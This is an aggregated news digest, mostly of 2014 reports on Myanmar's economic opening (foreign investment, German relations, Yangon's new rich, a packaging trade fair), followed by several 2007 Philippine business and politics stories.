The Taiwan Electrical and Electronic Manufacturers’ Association (TEEMA) said it will spend about $468.39 million (NT$ 14 billion) to develop an industrial park in Myanmar’s southern Ayeyarwady region in a bid to tap the lucrative growth potential of the recently opened country.

According to industry insiders, TEEMA has already signed a letter of intent with its local counterpart to solicit 1,400 hectares of land from the Myanmar government, according Taiwanese media reports.

The association has also commissioned Taiwan-based Sinotech Engineering Consultants Inc, a corporate consultant, to assess the feasibility of the project.

At a meeting with Taiwan’s Chinese National Association of Industry and Commerce, Economics Minister Woody Duh confirmed TEEMA’s project and said that the protection of Taiwanese investment in Myanmar is expected to see significant progress in the next two months, CENS reported.

Guo Tai-chiang, chairman of both TEEMA and the Cheng Uei Precision Industry Co, a leading contract maker of electrical connectors and adaptors, said that Japan and Korea are the most active countries in encouraging their firms to invest in Myanmar.

He said the Japanese government provides preferential financing aid, in association with local banks, to Japanese firms developing business in Myanmar.

Once the planned industrial park is in operation, Guo said, a thorough supply chain will likely be built, making it easier for Taiwanese firms it to explore the Myanmar market. This is especially significant given Taiwan’s lack of membership in the Association of Southeast Asian Nations and the stalemate over the signing of a cross-strait agreement on trade in goods and services with China.

Guo said investment in Myanmar can be a good alternative to investment in China and Vietnam, as labour shortages and the recent anti-China rioting have aroused concerns among overseas Taiwanese firms operating in those countries.

Cheng Uei’s subsidiary, Foxlink, will see the Taiwanese migration into the planned industrial park by setting up a fossil-fuel power station there to help alleviate Myanmar’s power shortages.

Source: Myanmar Business Today

Myanmar's President Thein Sein is currently on a European tour. His first stop was Germany, and the president will also travel to the Netherlands and Switzerland. On Wednesday, September 3, Thein Sein had a lunch meeting with German Chancellor Angela Merkel. Myanmar's government did not reveal much about the agenda of the meeting, however, the country's press said the president would extend "friendship and cooperation" to Germany. Diplomatic ties between the two countries date back to 1954 when the first German consulate in the Southeast Asian country was set up in Yangon. To mark the 60th anniversary of diplomatic ties - which have seen many ups and downs over the past decades - the German foreign office in Myanmar will organize an exhibition in early October.

German President Gauck visited Myanmar in February where he also met with pro-democracy leader Aung San Suu Kyi After the World War II, Germany became Myanmar's (then known as Burma) second largest trading partner. At the time, the West German arms manufacturer Fritz Werner, supplied guns and ammunition to the Burmese armed forces that were engaged in a long battle with the former Chinese army (Kuomintang) in Myanmar's north.

As part of this cooperation which lasted until the 1970s, hundreds of Burmese soldiers, were trained, as analyst Hans-Bernd Zöllner points out in an essay to commemorate the 60 years of bilateral relations. In 1965, Fritz Werner went bankrupt, and was taken over by the state. The company, however, continued to provide assistance to the country's security forces.

"The cooperation between the German company and its Burmese partner strengthened the relations between the two governments," wrote Zöllner. The 1962 military coup by General Ne Win did not harm German-Burmese ties. On the contrary, the General regularly visited the German region of Rheingau, where he met with government officials, politicians and businessmen. In the mid 1970s, Germany also initiated a number of other development projects in Burma under the auspices of the Society for Technical Cooperation (GTZ), which is now called GIZ.

Resumption of ties

The German-Burmese friendship ended abruptly, nevertheless, when the Southeast Asian country's military junta cracked down on a nationwide pro-democracy movement in 1988. Diplomatic relations between the two nations were reduced to a minimum, and the development cooperation was suspended. 23 years later, the diplomatic "ice age" ended as quickly as it had begun. Since late 2010, the government in Myanmar has triggered an unexpected reform process. In April 2012, the European Union lifted all sanctions against the country with the exception of the arms embargo. German President Joachim Gauck visited Myanmar in February this year, saying that "as long as the reforms are on the right track, they can't go fast enough."

Aung San Suu Kyi - A life for Myanmar

Aung San Suu Kyi is acclaimed internationally for her long struggle against Myanmar’s military junta that ruled the country until 2011. But criticism has mounted ever since she re-entered active politics. (08.04.2014) Germans hesitant to invest in Myanmar

Gauck pays tribute to Burma's Aung San Suu Kyi

But the fast pace is also full of risks. "No one was prepared for the changes in Myanmar. Our knowledge of the country decreased during the years of sanctions," Gerhard Will, analyst at the German Institute for International and Security Affairs (SWP), told DW. The focus of bilateral development cooperation is now set on medium enterprises and reforms of the financial system. Berlin is also supporting a project dealing with the training of journalists by the DW Academy.

"I am surprised that Myanmar's rural development is not our priority considering the fact that Germany has a great expertise in the area," Will said. "Cooperation in this sector would be interesting because we can achieve great results with little investment," he added. The expert is of the view that rural cooperation between the two countries would be helpful especially for the villagers who have so far not really benefited from the reforms.

Economic cooperation On the economic front, the German commitment to Myanmar has so far not been very successful, says Will. The reason, he adds, is that China and Thailand have dominated Myanmar's market for a long time; hence it is difficult for German companies to compete with them.

German companies Henkel and Stada are now in the race. Henkel manufactures detergents, whereas Stada will start producing pharmaceutical products by 2015. Despite limited economic cooperation, Germany is still the EU's main trading partner for Myanmar. Germany and Myanmar are hopeful that the economic cooperation will expand soon.

Source: Deutsche Welle

Japan is set to supply three new ferries to Myanmar in a bid to provide round trip service across the Yangon river, according to the Inland Water Transport Authority (IWTA).

In order to supply these ferries, the Japan International Cooperation Agency (JICA) is collaborating with Myanmar and will be studying the waterway between Pansodan and Dala jetties over the next year.

Although the construction of the three ferries was completed over a month ago, they have not yet been transferred to Yangon.

Initially, the ships were to be driven to Myanmar, but due to bad weather in the South China Sea, they are to be delivered via a large ship arriving from Japan, said U Myint Than Tun, deputy director of marine division of IWTA.

“All three ferries are ready, but we cannot say for sure when they will get here because the Japanese side is arranging the transfer. They are looking for a large vessel, which has the capacity to load the three ferries, and will then head in our direction,” él dijo.

The pilots who will run the new ferries have been enrolled in a two-week training program in Japan. The ferries are named Cherry 1, 2 and 3 in reference to the cherry blossoms from Japan, U Myo Naing, deputy director of the transport division of IWTA, said.

“It’s good news that new ferries are coming. The current ferries are so crowded with vendors selling goods that even I feel sorry for the foreigners who take them,” told a commuter who comes to Yangon from Dala daily for work.

Currently, three ferries, named Htee Hlaing Shin, Kyan Sit Thar and Tapin Shwe Htee, make up the fleet that runs the route to and from Yangon and Dala. Two ferries operate daily as each one is inspected for repairs every two days. The ferries run from 5am to 9:30pm and transport 25,000 to 30,000 passengers daily, according to IWTA.

Source: Myanmar Business Today

YANGON, Myanmar — On this balmy Saturday evening at Yangon's Wardan jetty, dock workers have momentarily stopped loading and unloading crates from rickety fishing boats. Vegetable sellers that line the dusty road by the Yangon River are sitting quiet, and trishaw drivers, too, have stopped shouting out at passersby to offer them rides.

Instead, they are watching amused—and confused—as socialites from Hong Kong, London and beyond hike up their flowing skirts and gingerly tread on the dirt track, careful that their heeled shoes stay clear of potholes and muddy patches. Avoiding the oversized rats burrowing through garbage nearby, this sampling of the world's beautiful people is heading to Transit Shed 1, a rusting industrial warehouse whose corrugated iron roof and green exterior blends in seamlessly with the ramshackle jetty that surrounds it.

Yet the scene inside Transit Shed 1—or TS1, as its creators prefer it be called—is a world away from the rest of Myanmar, the poorest country in Asia after Afghanistan and Nepal. Contemporary art work featuring children with Burmese mythical dragons lines one wall, while a Who's Who of Myanmar society—everyone from former political prisoners to ambassadors—sip champagne with a host of young, wealthy, globetrotting compatriots.

It is opening night at the venue, part exhibition space and part retail venture. The brainchild of Ivan Pun, the 29-year-old Oxford-educated youngest son of one of Myanmar's richest tycoons, TS1 hopes to inject a new hip glamour to this decaying city that has undergone a celebrated political and economic transition in recent years after almost six decades of military rule.

And with hip, comes some eye-opening price tags. In an adjoining room, a bench made of teak from Myanmar's Shan state sells for $2,500. Blouses and other gifts carry labels for TS1's signature brand, MyanmarMade. Coming soon: The retail space will host a high-fashion showcase including designers like Proenza Schouler, purveyor of thousand-dollar satchels, and Prabal Gurung, the Nepalese-American fashion designer whose designs have been worn by the likes of Michelle Obama and Kate Middleton.

"We want to see if Myanmar is ready for something like this," Pun said later after the event, dressed in a black T-shirt and skinny jeans. "There is a thirst in consuming and buying that is not being satisfied."

Pun's vision is just the beginning of a new Myanmar, featuring glam and glitz that is funded, spearheaded and enjoyed by repatriates that escaped the country during its days under brutal military control. That dictatorship ended in 2011, when a new, nominally civilian government assumed power, and since then its leaders have loosened restrictions on public gatherings and opened the doors to foreign investment, leading Western governments to lift most economic sanctions. Now that Myanmar is embracing Western-style consumerism for the first time in more than a generation, Pun and his compatriots are playing tastemakers.

It doesn't seem to deter them that the country's gross domestic product per capita works out to only $1,700 per year, compared to $62,400 in Singapore or $52,800 in the U. S. according to the CIA World Factbook. Just behind the TS1 retail space, children prowl through garbage looking for toys to play with.

People in Myanmar "have not yet developed taste as consumers," Pun says. It's like starting from scratch, he says. "Some markets are set in their preferences—like India and Indonesia—but here we can curate our offerings and bring designers that are interesting to fashion editors in London, New York and Paris rather than what is commercially available."

& # 8220; This vision is just the beginning of a new Myanmar, featuring glam and glitz that is funded and enjoyed by repatriates that escaped the country. & # 8221; CUT OFF FROM the outside world for so long, tropical Myanmar is following a trail blazed earlier by countries such as Russia, Vietnam and China that unlocked new wealth when they embraced elements of capitalism after decades of isolation. Their openings spawned scores of first-generation millionaires and billionaires—some through legitimate businesses, others through corrupt or illegal means—and experts expect Myanmar to be no different.

The country's economic reforms are creating big new opportunities as authorities issue licenses for everything from banking to oil-and-gas exploration to mobile-phone networks. Wealth-X, a consultancy that specializes in tracking the rich, says there are currently only about 40 individuals considered ultra-high-net worth in Myanmar, with investible assets over $30 million. But it says this number could grow by more than seven times in the next decade—the fastest such pace of growth anywhere in the world, the consultancy says.

Signs of a New Money boom are already appearing. After prohibiting imports of foreign vehicles for years except for top generals, the government has eased restrictions, and now showrooms boast black Rolls Royce sedans and Jaguar sports cars. Residents see Ferraris, Bentleys, Porsches and even a Bugatti Veyron—the fastest street-legal car make in the world—alongside rusty taxis that would look more appropriate on a scrapheap.

Prices for prime real estate in Yangon, Myanmar's commercial capital, are skyrocketing. A modest two-story, four-bedroom house in the exclusive Golden Valley neighborhood rents for as much as $10,000 per month, real-estate agents say. Families with older colonial-era bungalows are tearing them down and replacing them with colonnaded mansions, while their 20-something kids gather in nightclubs ordering Johnnie Walker blue label whisky.

Myanmar also is popping up on the radar screens of private wealth managers and luxury-goods brands hungry for a new source of growth at a time when China is slowing down. Myanmar residents spent only about $1.9 million on wine last year, according to consumer-market research firm Euromonitor International, but sales are expected to more than double by 2018. After that, the sky's the limit. Myanmar is "the last economic frontier in Asia with significant growth potential," Euromonitor says.

"Even I did not realize how much wealth there was here," says the young Pun, whose father, a property and banking entrepreneur named Serge Pun, has seen his estimated net worth swell by $100 million to $600 million over the past year, according to Forbes magazine. "When you look at mass gatherings, weddings especially, and see the lines of Ferraris and BMWs outside—people are not shy to show off."

& # 8220; A big question is whether Myanmar can absorb this new wealth without seeding class tensions. & # 8221; A big question is whether Myanmar can absorb this new wealth without seeding the kind of class tensions that at times have threatened to destabilize other emerging markets, including some of those—like Russia and China—that eschewed displays of wealth in earlier times. Just a few years ago, Myanmar's leaders frowned upon conspicuous consumption, and the few families that held significant financial assets mostly tended to squirrel them away in overseas bank accounts rather than flaunt them at home.

Now, locals say benefits from the country's opening are accruing often to elites with ties to the former military junta. Some Myanmar business leaders are still targeted by Western economic sanctions because of alleged ties to drug trafficking, corrupt government contracts or wasteful extraction of natural resources.

"All the black money that people were hiding is now coming out," says Cheery Zahau, a democracy activist from Myanmar's Chin state whose work with the United Nations has been recognized by the George W. Bush Institute. For the rich, Zahau argues, it is a competition—one buys a Ferrari, and the other buys a Bentley, one builds a five-story mansion, and the next family, a six-story mansion. "It is sick. We don't need the World Bank or the IMF, we need these people—these very, very rich people—to spend money in a way that is not ignorant."

The country's newly-rich say the picture is a little more complicated. After all, they say, can people be blamed for wanting to splurge a little after so many years of privation?

Carl Moe Myint trains his sailing team at his father's sailing club in Yangon, Myanmar Photo by Kaung Htet for WSJ. Money IT'S A BREEZY DAY in the midst of Myanmar's relentless monsoon season, and 29-year-old Carl Moe Myint is relaxing at the Yangon Sailing Club in a crisp blue shirt and black pants, his skin tanned from years on the waters off South Africa, Singapore and Thailand.

Founded in 1924 during the era of British colonial rule, the Sailing Club on a picturesque lake in the center of Yangon was ravaged during World War II, and again by a cyclone in 2008. More recently, its clubhouse, restaurant, bar and boat sheds have all been painstakingly restored, complete with wooden boards displaying names of past commodores—largely with funding from Moe Myint's family. The club now serves as a refuge for Myanmar's growing number of rich elites and expatriates—its membership increased by 30 percent in the past year—who enjoy relaxing surrounded by perfectly-clipped lawns.

Moe Myint's father, Michael Moe Myint, is a wealthy rare-book collector and sailing aficionado who also helms MPRL E&P Pte Ltd. Co. the largest privately owned oil and gas-services company in Myanmar. When 20 coveted tenders for offshore exploration were given out to foreign companies earlier this year, the elder Moe Myint's firm was a partner for four. (He and his company aren't targeted by Western sanctions, which prohibit business dealings with some individuals over links to the former military government.) The younger Moe Myint is focusing on other passions, he says.

"As long as our family is here, sailing will be here," Carl Moe Myint says as boats glide by in the background. Having returned from the Colorado School of Mines in 2008, where he majored in economics, Moe Myint now is working on an even bigger project than restoring Yangon's historic Sailing Club: helping turn Ngwe Saung, a coastal town four hours away by car, into an international sailing playground.

Central to the plan: the $17 million Ngwe Saung Yacht Club, a resort and yachting center his family launched last year at the far end of Ngwe Saung's nine-mile stretch of pristine sand. Built entirely with family money, it features an infinity pool overlooking the ocean, villa suites with verandas and a nightclub—all in an area where many residents still live in dilapidated wooden homes and only get electricity a few hours per day.

"Money was not the issue, we did this for the sport of sailing, and to make sure that with our revenue, the sport can survive here," he says in a flawless American accent.

Carl Moe Myint says he would like to develop the yacht club into a major marina in the next decade, with sailing enthusiasts from Myanmar and beyond parking their boats there.

"Because of reforms," he says, "there is a lot of wealth splashing around." The shame of it, he says, is that too few of Myanmar's rich want to spend money on developing their passions, and would rather spend it frivolously in nightclubs. Investments in public amenities like art galleries or public parks, much less major philanthropic initiatives, remain scant.

Other well-off residents concur. Patrick Robert, a 67-year-old French architect who has lived in Yangon for more than 20 years, says he has been frustrated by how little local elites seem to care about spending their money well. A former museum curator, he now designs homes, hotels and restaurants for wealthy clients around the world and works on preservation projects.

He is helping restore several of Yangon's decaying, mildewed colonial structures from the early 1900s. But, sitting in his Golden Valley bungalow surrounded by servants in exquisite uniforms of tight-fitted cap-sleeved shirts and Myanmar longyi sarongs, mixing glasses of Hendrick's gin and tonic, he says the demand for his designs is largely coming from expatriates and Western businessmen who want a Yangon base for new business ventures—not Myanmar's local gentry.

In April, Robert says, he helped organize a trip for a wealthy Myanmar man and his wife and two children to Europe—a man, he says, who was recently removed from Europe's sanctions list but is still blackballed by the U. S. Since it was the man's first trip to Europe, he wanted Robert to connect him to all the splendors the continent had to offer.

Robert arranged a private viewing at the Louvre in Paris during early morning hours when it is free of tourists, he says. But this businessman was not interested.

"One week in London, Rome and Paris and everything was buy, buy, buy. Chanel this and Louis Vuitton that, just buy buy buy," he says. The Myanmar millionaire, he says, was most grateful that Robert helped him procure a Hermès Birkin bag for his wife in a single day, rather than the usual wait of anywhere between three weeks to several years for an accessory that costs as much as $80,000.

"This class of new wealthy, they are giving me a lot of problems," he says.

& # 8220; Too few of Myanmar's rich want to spend money on developing their passions, and would rather spend it frivolously in nightclubs. & # 8221; IN DOWNTOWN YANGON, Ivan Pun leans back in a brown leather swivel chair at the Pun+Projects office, the firm he founded to work on what he calls "luxury retail concepts," starting with Transit Shed 1.

A pencil holder is filled with a dozen perfectly sharpened black pencils. Copies of stylish magazines like Monocle and Apartamento lie perfectly arranged on his desk. From his corner office on the 8th floor of the 11-story FMI Center—one of Yangon's only tall office buildings, built by his father to house the head offices of the Serge Pun & Associates Group—the younger Pun overlooks the streets of downtown Yangon, its tattered buildings drenched with rain and the golden Sule Pagoda sparkling in the distance. (Like Moe Myint, Pun's family is not targeted by Western sanctions).

On this Monday, he is chairing a meeting on TS1, discussing every aspect of the project from sales of art to upcoming exhibitions and the logistics of a restaurant—called Port Authority—in the shed just a few doors down from the TS1 space. Scheduled to open soon, the shed is facing a problem familiar in Myanmar: how to get electricity in to power the restaurant. The discussion then veers to how to keep flies out of TS1, a constant struggle since garbage litters the jetty.

He is interrupted three times in 10 minutes by his constantly ringing phone, and at one point in the meeting, he juggles two calls at once—one with the director of TS1's art exhibitions in Beijing, and another personal call on his cellphone. His staff—all in their late 20s and early 30s—clamor for his attention, as Pun signs off on every detail at TS1, from staff uniforms to how much of a discount to give on art as exhibitions come to an end.

Things are especially hectic on this day, Pun says, because he is just about to embark on a three-week trip to Hong Kong, Tokyo, New York and finally Brazil for the World Cup. In the U. S. he says, he will have the opportunity to check in on a pop-up shop in the East Hamptons, where products from his MyanmarMade brand are being sold all summer.

Pun says he has "a certain level of taste" from his time around the world that allows him to bring a variety of concepts to Myanmar. Growing up almost entirely in England, he was educated at the Cranleigh School, a boarding school in the town of Surrey, until he was 18. After making his way into Oxford University to major in Oriental studies, he dropped out in 2007—the major "didn't quite interest" him, he says—to pursue fashion and music. This brought him to Condé Nast in midtown Manhattan, where he worked on special editorial projects at Vogue magazine and another, now-defunct publication run by Anna Wintour.

He returned to Asia in 2009, working for a while in Beijing on a menswear line with some friends. Eventually he was lured back to his homeland of Myanmar in 2011, working for his father's conglomerate, which also has interests in manufacturing, retail and virtually every other major sector in the country. His last gig was in corporate development, before he broke off to set up Pun+Projects.

Last year, he hosted a private screening of the "Great Gatsby" in Yangon attended by his friend, Baz Luhrmann, the movie's director. Next, he says, he might consider inviting Wes Anderson for a similar private screening of his latest movie, "Grand Budapest Hotel," or organize a larger film festival.

When W Magazine staffers made a trip to the country last year to produce a 20-photo spread by photographer Tim Walker, Pun was, of course, in the loop. The series, titled "Gilt Trip," featured model Edie Campbell wearing Lanvin-label clothes near the sacred Golden Rock, a Buddhist pilgrimage site south of Yangon, and jumping with Kayan tribal "long-neck" women with brass rings around their necks.

Later in the day, Pun rides in a large white Toyota 7203.TO +0.16% minivan to TS1, replying to emails on his phone in the backseat—an impressive feat considering that Myanmar's primitive telecom system doesn't support such services in most places. It's OK, though, because the van is kitted out with its own Wi-Fi.

At TS1, he inspects products from its new retail offering, including furniture from the avant-garde, Chinois-style luxury brand Lala Curio, a Hong Kong-based interior designer. He sits on a $16,500 couch and picks up a decorative item of peacock feathers stuck on a wooden block, checking its retail price. It is $65.

His hope, he says, is that he helps create an environment that "isn't just for Yangon, but is about what we believe is cool, and are bringing here to Yangon." And it certainly doesn't feel out of place in such a rough-hewn country, he says.

"It is not too early to start thinking about this" in Myanmar, he says, leaning back in his chair. "Wages are increasing, wealth is increasing—we don't know how long this is going to take, but it will happen.

Source: Wall Street Journal

Bank to lend to gems industry to open soon A Gems Development Public Bank will be established soon to lend to business people from the industry, local media quoted Myanmar Gems Merchants Association Chairman Yone Mu as saying. There are about two dozen local private banks in Myanmar at the moment.

Japan FDI to increase in current fiscal year Japanese foreign direct investment (FDI) into Myanmar during the present fiscal year, which started on April 1, will be much more than last year, especially in the SME and infrastructure sectors, local media quoted Federation of Chambers of Commerce and Industry Chairman Win Aung as saying at a recent forum. Total Japanese FDI in the first five months of this fiscal year was $327 million, more than during the same period in the previous fiscal year.

Sugar Development Public Co to sell up to 200,000 shares Myanmar Sugar Development Public Co, established in March, will sell up to 200,000 shares. Sales started starting on August 26 at K11,000 ($11.36) a share, local media quoted Managing Director Win Htay of the company as saying. The company had sold 300,000 shares before its incorporation as a public limited company in March.

Total forex reserves estimated at over $5b Myanmar’s total foreign exchange reserves is estimated at just over $5 billion, local media quoted Zaw Oo, the president’s economic adviser, as saying. The central bank said last September that forex reserves were at $7.6 billion. Over $5 billion is just enough to meet five months’ imports.

Rice exports up 25pc on Russian demand Rice exports from Myanmar have risen more than 25 percent this fiscal year, according to the latest figures from the Ministry of Commerce. Between April 1 and August 15, $196 million worth of rice has been exported, up $57 million from the same period last fiscal year, the ministry said, attributing the rise to increased demand for steamed rice from Russia. Rice exports rose to 1.33 million tonnes worth $528 million in fiscal year 2012-13, but dropped to 1 million tonnes last fiscal, fetching $380 million.

Airbus taps Myanmar’s tourism Airbus Helicopters Southeast Asia says Airbus hopes to sell or lease helicopters to tourism service operators in Myanmar. Airbus Helicopters Southeast Asia vice president, Lionel Sinai-Sinelnikoff, told local media that Airbus hopes to supply helicopters for sightseeing trips similar to what is offered by hot air balloons at Bagan.

Indian Gov’t plans to import 500,000 tonne rice from Myanmar The Indian government is planning to import 500,000 tonnes of rice from Myanmar to meet its Public Distribution System (PDS) requirements of two north-eastern states, Tripura and Mizoram. This comes in the wake of likely disruption of rice supply to these states due to the proposed railway gauge conversion work starting October 1. It is for the first time in decades that the country will import rice in such significant quantities for PDS purpose. The idea is to import from the neighbouring country for a year, as the mega block would likely exist for that period of time.

Source: Myanmar Business Today

ProPak Myanmar 2014 and Plastics & Rubber Myanmar 2014 opens today, and will run for 3 show days from 4 to 6 September, at the Myanmar Convention Centre (MCC Hall), Yangon. Organised by Bangkok Exhibition Services (BES) Ltd, An Allworld Exhibitions member.

ProPak Myanmar 2014 and Plastics & Rubber Myanmar 2014 are 2 important international trade exhibitions that will drive industry forward. Helping to grow and support local industry to develop and realise its true potential for processed and packaged food, drink and pharmaceutical products.

Myanmar is an agricultural land. Agriculture is a key sector of Myanmar economy and contributes approx. 58% of the country’s GDP and 48% of its exports. Myanmar has rapidly emerged as one of Asia’s newest and brightest frontier markets with forecasted GDP growth of 7% per annum over the next 5 years and the development and modernisation of its food, drink and pharmaceutical related industries can present many great opportunities for both economic and social development.

Currently Myanmar’s food exports are predominately raw materials including rice, beans, pulses, fish and seafood and with international sanctions being lifted exports will increase significantly and present many more and new opportunities for processed and packaged products.

As business in Myanmar transforms so will its middle class with higher incomes and demand for new, safer and more hygienic food, drink and pharmaceutical products. With this increasing demand comes the need for new machines, technology and services and ProPak Myanmar 2014 and Plastics & Rubber Myanmar 2014 will present this and more to the industry.

ProPak Myanmar 2014, is the first international processing & packaging trade event for the food, drink and pharmaceutical industries in Myanmar. Held together with Plastics & Rubber Myanmar 2014, the first international plastics and rubber materials and technology trade exhibition for Myanmar.

Together, these events will present over 185 exhibitors from 23 countries, 3 international pavilions from Singapore, Taiwan and Thailand and the first national conference for the development of food science and technology in Myanmar.

The line-up of exhibitors includes world-renowned companies including; ABC Compressors, Absolute Packaging and Automation, Amut, Bangkok Glass, Bericap, Bush Vacumm, Delmax Machinery, Gardner Denver, German Engineering and Machinery, Henkel, Hopak Machinery, Ishida, KHS, KWT Machine Systems, Melchers Techexport, Modern-Pak, Nippon Pack, Piovan, Premier Tech Chronos, Rieckermann, Sanko Machinery, Sidel, Sumitomo Heavy Industries, V. F. Korea Corp, Winner Inter Plas, Wolf Verpackungsmachinen and many many more.

The first national conference on the development of food science and technology 2014 will present an international programme including speakers from Australia, Malaysia, Singapore and Thailand. Organised by the Food Science & Technology Association (FoSTA), Myanmar and Bangkok Exhibition Services (BES) Ltd the first edition of the conference is offered free-of-charge to industry delegates in order to present the best opportunities for education and networking to an underdeveloped industry with huge potential.

These events are supported by the Myanmar Industries Association (MIA), Myanmar Food Processors and Exporters Association (MFPEA) and the Food Science and Technology Association (FoSTA), Myanmar as well as many other industry associations.

ProPak Myanmar 2014 and Plastics & Rubber Myanmar 2014 are “MUST-ATTEND” events for the industry. Do not miss your chance to visit ProPak Myanmar 2014 and Plastics & Rubber Myanmar 2014, taking place Thursday 4th to Saturday 6th September 2014 at MCC Hall. Opening hours are 9am to 5pm every day. To visit ProPak Myanmar 2014 and Plastics & Rubber Myanmar please come to MCC Hall and register on-site.

For more information please contact:

Bangkok Exhibition Services (BES) Ltd Contact PR Executive: Ms. Wantita Porntanawong (Bow) Tel. +662 615-1255 ext. 123 Email: wantita@besallworld. com

Information Matrix Contact: Htet Wai Zaw Tel. +95 1 513 515 – 519 Email: marketing@informationmatrix. com

ProPak Myanmar 2014 and Plastics & Rubber Myanmar 2014 Date: 4 - 6 September 2014 Opening Hours: 9am – 5pm Venue: Myanmar Convention Centre (MCC Hall), Yangon Website: www. propakmyanmar. com / www. plasticsandrubbermyanmar. com

By Bernardette S. Sto. Domingo Original report at BusinessWorld http://www. itmatters. com. ph/news. php? id=112307a

THE BUSINESS process outsourcing (BPO) industry is targeting another 40% growth next year on the back of strong demand for back office, engineering and financial services.

Oscar R. Sañez, chief executive officer of the Business Processing Association of the Philippines (BPAP), said the industry is expected to end the year with more than 300,000 jobs and revenues of about $4.5 billion-$5 billion from $3.3 billion last year.

"Next year, we are looking at $7 billion. Two thousand seven is a turning point for the industry. Before 2007, we were growing without a direction now we have more focused strategies required to meet our goals," he said.

Mr. Sañez said BPAP also expects an influx of big-ticket investments. "I talk to two to three investors every week, mostly from the US and the UK. There’s very keen interest here for back office, financial, and engineering services," he said.

BPAP earlier launched the Roadmap 2010, which outlined initiatives to capture 10% of the global market share by 2010 and boost revenues to a range of $13 billion to $16 billion as the country positions itself as the second or third largest BPO service provider worldwide.

With a larger market share from the current 5%, the industry is looking at creating about 3.5 million jobs.

Mr. Sañez said the country is positioning to achieve a 10% share of the $130-billion global BPO market by 2010, or about $13 billion to $16 billion from the current $3.3 billion, by addressing major issues such as sustaining talent supply, creating new locations and sustaining the right business environment for investors.

India now corners 40% of the global BPO market, but the Philippines is "in the big opportunity seat," the BPAP official said.

He also said the industry will work with the academe and the government to ensure the country’s growth in the offshore business. He said the industry will collaborate with colleges and universities, adding that improved education is expected to support the talent requirement of the industry.

The government, for its part, needs to ensure that healthy tax incentives are in place to attract more BPO investors, Mr. Sañez said.

Benedict Hernandez, vice-president and general manager of call center firm eTelecare Global Solutions, earlier said the call center industry is expected to generate about 500,000 jobs and $4.8 billion-$7 billion in revenues by 2010. The industry currently employs 200,000 call center agents and raised about $3 billion in revenues last year.

For his part, Rainerio Borja, president of People Support ( Philippines ), Inc. said the industry also needs to provide training programs and beef up the education system to sustain the growth of the BPO industry, adding investments are needed to develop human resources.

"We have achieved so much in the last six to seven years, but we’re not resting on our laurels. We’re working on the challenges to get to where we want to be," he said. & # 8212;

Original report at The Manila Standard http://www. manilastandardtoday. com/?page=news6_nov24_2007

A GROUP of visiting European Parliament members yesterday praised President Gloria Macapagal Arroyo’s tough stance on Myanmar and called Manila a “pillar of democracy” in Southeast Asia.

“We would like to underline how much we appreciate the democratic structure of this country,” said Hartmut Nassauer, chairman of the European parliament’s delegation for relations with the Association of Southeast Asian Nations.

While the Philippines has its own problems, including a wave of extra-judicial killings and perceived corruption, “compared to the other Asean member states, to our point of view, the Philippines are a pillar of democracy,” Añadió.

Nassauer, part of a European parliament delegation visiting the country to meet officials and inspect European Union-funded development projects, praised Mrs. Arroyo for speaking out against Myanmar’s junta at an Asean summit earlier this week.

“I must say we are impressed by the performance of your president in the Asean summit in Singapore,” Nassauer said.

Mrs. Arroyo on Wednesday called for the immediate release of Myanmar’s opposition leader Aung San Suu Kyi, warning that Filipino lawmakers might refuse to ratify Asean’s first-ever charter until she was freed.

Aung San Suu Kyi has been under house arrest for 12 of the past 18 years.

Nassauer reiterated that the European Parliament would block a proposed free trade deal between the EU and Asean unless progress was made on the human rights front in Myanmar, which faced international condemnation after its bloody suppression of anti-government protests in September.

The group also met with Supreme Court Chief Justice Reynato Puno to discuss allegations that military and police elements were behind some of up to 800 murders of leftist dissidents as well as those of a number of provincial journalists.

The issue was “a big problem because it is influencing the picture of the Philippines in the free world,” Nassauer said.

The delegation encouraged the government to make progress in this area by prosecuting suspects. AFP

By Francis Earl A. Cueto, Reporter Original report at The Manila Times http://www. manilatimes. net/national/2007/nov/24/yehey/top_stories/20071124top4.html

THE European Union (EU) on Friday said it believes that the loans that they are allotting to the Philippines are being used properly, contrary to earlier claims made by the US-based World Bank that its road-loan projects in the Philippines are tainted with anomalies.

Hartmut Nassauer, chairman of the European Parliament’s delegation for relations with the Association of Southeast Asian Nations (Asean), told media in a briefing that the EU loans are put to good use.

Nassauer, part of a European Parliament delegation visiting the country to meet with Philippine officials and inspect EU-funded development projects, said their trip does not indicate their finding of anything anomalous about such projects.

“I must say that we have a strong monitoring [system],” Añadió. “We have good reasons to rely on our own administration and monitoring systems, and there are checks and monitoring actions that we have done. I am convinced that [the Philippine government is] doing well with the money of the EU.”

This was not the first time that an international body debunked the image painted by the World Bank with loans to the Philippines. Presidential Commission on Good Government (PCGG) Commissioner Nicasio Conti earlier said the United Nations even praised the anticorruption efforts of the government.

Conti, a guest at a UN convention where he discussed government efforts to recover the Marcos family’s allegedly ill-gotten wealth, added that the international community does not perceive the Philippine government to be corrupt.

The Crime Conventions Section, a branch of the United Nations Office on Drugs and Crimes, has said there is a clear effort by the Philippines to rid its agencies of graft and corruption.

Conti, the corporate secretary of Bisyon 2020, presented a private sector-initiated anticorrup­tion scheme pioneered in 2005 by businessmen and captains of the industry. “Bisyon,” the Pilipino word for vision, stands for Business for Integrity and Stability of Our Nation.

Earlier, the World Bank said it had not suspended any loan to Manila, adding it would push the continuation of deliberations on phase 2 of the government’s National Road Improvement and Management Program, which is involves a $232-million loan.

Nassauer said corruption is not an isolated problem in the Philippines as it is a worldwide phenomenon that is being addressed by every government.

The statement was a far cry from what was revealed by the World Bank, which expressed concerns over alleged corruption, prompting them to withhold a total of $265 million in two phases of a loan program to finance road construction in the Philippines.

Agreement gives opportunity for small farmers to export products like small pineapples and organic vegetables

By Efren L. Danao, Senior Reporter Original report at The Manila Times http://www. manilatimes. net/national/2007/nov/24/yehey/metro/20071124met1.html

More Philippine products will enter the Japanese market once the Japan-Philippines Economic Partnership Agreement (JPEPA) is ratified, government officials told a Senate hearing presided by Sen. Mar Roxas on Friday.

Agriculture Undersecretary Segredo Serrano said that local producers of tropical fruit wines, small bananas, small pineapples, tropical vegetables and organically-grown vegetables are among those that Japan had agreed to import from the Philippines once JPEPA becomes effective.

He pointed out that the Philippines is not exporting these products to Japan at the moment.

“These products will enjoy zero tariff in Japan immediately. These are produced by small farmers and cooperatives,” Serrano said.

The Philippines exports $700 million worth of agricultural products to Japan each year, with $500 million accounted for by bananas.

Roxas said it is important for the Senate to determine what Japanese agricultural products could enter the Philippines tax-free so they could determine if it would be detrimental to small farmers and fishermen.

